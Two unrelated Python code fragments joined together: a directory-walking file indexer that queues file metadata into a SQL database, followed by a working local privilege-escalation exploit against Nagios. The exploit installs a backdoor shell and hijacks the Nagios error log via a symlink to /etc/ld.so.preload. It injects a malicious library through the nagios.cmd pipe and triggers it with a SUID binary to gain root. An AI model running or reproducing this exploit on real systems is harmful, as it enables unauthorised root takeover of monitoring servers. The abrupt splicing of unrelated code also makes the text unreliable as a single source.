mft_parser_cpp(MFT_file_path, TEMP_DB_NAME, table_name) insert_db_thread.update_progress_SIGNAL.emit( -2, -2, uuid) else: session = MftSession(MFT_file_path) session.start(table_name, self.sql_insert_queue, self.sql_insert_mutex, self.sql_insert_condition) while session.isRunning(): session.wait(timeout_ms=1000) logger.info("Waiting... Running...") if self.flag.quit_flag or self.flag.restart_flag: break session.quit() del session MFT_parser_successful_flag = True except Exception as e: logger.error(str(e)) self.show_statusbar_warning_msg_SIGNAL.emit(str(e)) if not MFT_parser_successful_flag: num_records = 0 mftsize = estimate_num_of_files(root_path) dir_queue = collections.deque() dir_queue.append(root_path) while dir_queue: if OS_SCANDIR_FLAG: if self.flag.quit_flag or self.flag.restart_flag: break next_path = dir_queue.popleft() # BFS # next_path = dir_queue.pop() # DFS try: for entry in os.scandir(next_path): num_records += 1 if self.flag.quit_flag or self.flag.restart_flag: break file_or_dir = entry.name full_file_or_dir = entry.path if entry.is_symlink(): # symbolic link continue l_stat = entry.stat( follow_symlinks=FOLLOW_SYMLINKS_FLAG) if l_stat.st_dev != 0: major_dnum = os.major(l_stat.st_dev) minor_dnum = os.minor(l_stat.st_dev) else: major_dnum = minor_dnum = 0 if GlobalVar.SKIP_DIFF_DEV and ( (device_maj_num != major_dnum) or (device_min_num != minor_dnum)): print( "In different device: %s vs. %s" % (full_file_or_dir, root_path)) continue if entry.is_dir( follow_symlinks=FOLLOW_SYMLINKS_FLAG ): # https://docs.python.org/2/library/stat.html # It's a directory, recurse into it if full_file_or_dir in self.skip_dir: print('Dir %s skipped.' % full_file_or_dir) continue dir_queue.append(entry.path) self.sql_insert_mutex.lock() self.sql_insert_queue.put([ table_name, [ file_or_dir, next_path[root_path_len:] if next_path[root_path_len:] else '/' + next_path[root_path_len:], None, True, int(l_stat.st_atime), int(l_stat.st_mtime), int(l_stat.st_ctime) ], num_records, mftsize, uuid ]) self.sql_insert_condition.wakeOne() self.sql_insert_mutex.unlock() elif entry.is_file( follow_symlinks=FOLLOW_SYMLINKS_FLAG ): self.sql_insert_mutex.lock() self.sql_insert_queue.put([ table_name, [ file_or_dir, next_path[root_path_len:] if next_path[root_path_len:] else '/' + next_path[root_path_len:], l_stat.st_size, False, int(l_stat.st_atime), int(l_stat.st_mtime), int(l_stat.st_ctime) ], num_records, mftsize, uuid ]) self.sql_insert_condition.wakeOne() self.sql_insert_mutex.unlock() except Exception as e: print(e) continue else: if self.flag.quit_flag or self.flag.restart_flag: break next_path = dir_queue.popleft() try: for file_or_dir in os.listdir(next_path): num_records += 1 full_file_or_dir = os.path.join( next_path, file_or_dir) try: l_stat = os.lstat(full_file_or_dir) except OSError as e: print(e) continue mode = l_stat.st_mode if stat.S_ISLNK(mode): # symbolic link continue if l_stat.st_dev != 0: major_dnum = os.major(l_stat.st_dev) minor_dnum = os.minor(l_stat.st_dev) else: major_dnum = minor_dnum = 0 if GlobalVar.SKIP_DIFF_DEV and ( (device_maj_num != major_dnum) or (device_min_num != minor_dnum)): print( "In different device: %s vs. %s" % (full_file_or_dir, root_path)) continue if stat.S_ISDIR(mode): # https://docs.python.org/2/library/stat.html # It's a directory, recurse into it if full_file_or_dir in self.skip_dir: print('Dir %s skipped.' % full_file_or_dir) continue dir_queue.append(full_file_or_dir) # self.sql_insert_mutex.lock() self.sql_insert_queue.put([ table_name, [ file_or_dir, next_path[root_path_len:] if next_path[root_path_len:] else '/' + next_path[root_path_len:], None, True, int(l_stat.st_atime), int(l_stat.st_mtime), int(l_stat.st_ctime) ], num_records, mftsize, uuid ]) self.sql_insert_condition.wakeOne() self.sql_insert_mutex.unlock() elif stat.S_ISREG(mode): # regular file self.sql_insert_mutex.lock() self.sql_insert_queue.put([ table_name, [ file_or_dir, next_path[root_path_len:] if next_path[root_path_len:] else '/' + next_path[root_path_len:], l_stat.st_size, False, int(l_stat.st_atime), int(l_stat.st_mtime), int(l_stat.st_ctime) ], num_records, mftsize, uuid ]) self.sql_insert_condition.wakeOne() self.sql_insert_mutex.unlock() elif stat.S_ISSOCK(mode): # print('Found socket: %s' % full_file_or_dir) continue elif stat.S_ISFIFO(mode): # print('Found FIFO (named pipe): %s' % full_file_or_dir) continue else: # raise Exception("Unkown file type: " + full_file_or_dir) # print ("Unkown file type: " + full_file_or_dir) continue except Exception as e: # OSError # print(e) continue # self.update_progress_SIGNAL.emit(-2, -2, uuid) # end logger.info("ALl sql_insert queued.") while not self.sql_insert_queue.empty(): if self.flag.quit_flag or self.flag.restart_flag: break time.sleep(0.1) logger.info(" sql_insert queue empty.. or quit/restart" + str(self.flag.quit_flag) + str(self.flag.restart_flag)) except Exception as e: print("Error when updating db: " + str(e)) self.show_statusbar_warning_msg_SIGNAL.emit( "Error when updating db: " + str(e)) finally: try: insert_db_thread.quit() except: pass self.merge_db_slot() self.update_progress_SIGNAL.emit(-3, -3, uuid) # Done
def explotation(self): subprocess.run(["cp", self.BACKDOORSH, self.BACKDOORPATH], stdout=subprocess.PIPE, stderr=subprocess.PIPE) backdoor_path = Popen(["ls", "-l", self.BACKDOORPATH], stdout=subprocess.PIPE, stderr=subprocess.PIPE).communicate()[0] self.print_info("Backdoor/low-priv shell installed at: \n" + backdoor_path.decode('utf-8').strip()) # Safety check if self.check_file_exists(self.preload_file_name): self.print_warn( "/etc/ld.so.preload already exists. Exiting for safety.") self.cleanexit() sys.exit(2) # Symlink the Nagios log file error_log = self.options["nagios_error_log"][1] stdout, stderr = Popen("rm -f " + error_log + " && ln -s " + self.preload_file_name + " " + error_log, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).communicate() if (str(stdout) != None and str(stderr) != None) and (stdout.decode('utf-8') != "" or stderr.decode('utf-8') != ""): self.print_warn("Couldn't remove the " + error_log + " file or create a symlink.") self.cleanexit() sys.exit(3) symlynk_path = Popen(["ls", "-l", error_log], stdout=subprocess.PIPE, stderr=subprocess.PIPE).communicate()[0] self.print_info( "The system appears to be exploitable (writable logdir) ! :) Symlink created at: \n" + symlynk_path.decode('utf-8').strip()) # Starting real explotation self.print_info("Waiting for Nagios service to get restarted...") response = input( "Do you want to shutdown the Nagios daemon to speed up the restart process? ;) [y/N] " ) if response.upper() == "Y": command = "/usr/bin/printf \"[%lu] SHUTDOWN_PROGRAM\\n\" `date +%s` > " + self.commandfile stdout, stderr = Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).communicate() sleep(3) nagios_process = Popen("ps aux | grep -v grep | grep -i 'bin/nagios'", stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).communicate()[0] if nagios_process != None and nagios_process.decode('utf-8') != "": self.print_info("Nagios stopped. Shouldn't take long now... ;)") while True: sleep(1) if not self.check_file_exists(self.preload_file_name): error_log = self.options["nagios_error_log"][1] subprocess.run(["rm", "-f", str(error_log)], stdout=subprocess.PIPE, stderr=subprocess.PIPE) break preload_privileges = Popen("ls -l " + self.preload_file_name, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).communicate()[0] self.print_info("Nagios restarted. The " + self.preload_file_name + " file got created with the privileges: \n" + preload_privileges.decode('utf-8')) sleep(3) # Wait for Nagios to create the nagios.cmd pipe is_pipe = stat.S_ISFIFO(os.stat(self.commandfile).st_mode) if not is_pipe: self.print_warn("Nagios command pipe " + self.commandfile + " does not exist!") sys.exit(2) self.print_info( "Injecting " + self.PRIVESCLIB + " via the pipe nagios.cmd to bypass lack of write perm on ld.so.preload" ) now = calendar.timegm(time.gmtime()) command = "/usr/bin/printf \\\"[%lu] NAGIOS_GIVE_ME_ROOT_NOW!;; " + self.PRIVESCLIB + "\\\n\\\" " + str( now) + " > " + self.commandfile stdout, stderr = Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).communicate() sleep(1) stdout = Popen("grep -q " + self.PRIVESCLIB + " " + self.preload_file_name, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).communicate()[0] if stdout == None or stdout.decode('utf-8').strip() == "": result = Popen("cat " + self.preload_file_name + " | grep \"" + self.PRIVESCLIB + "\"", stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).communicate() self.print_info("The " + self.preload_file_name + " file now contains: \n" + result[0].decode('utf-8')) else: self.print_warn("Unable to inject the lib to " + self.preload_file_name) sys.exit(2) self.print_info("Triggering privesc code from " + self.PRIVESCLIB + " by executing " + self.SUIDBIN + " SUID binary") Popen("sudo 2>/dev/null >/dev/null", stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).communicate()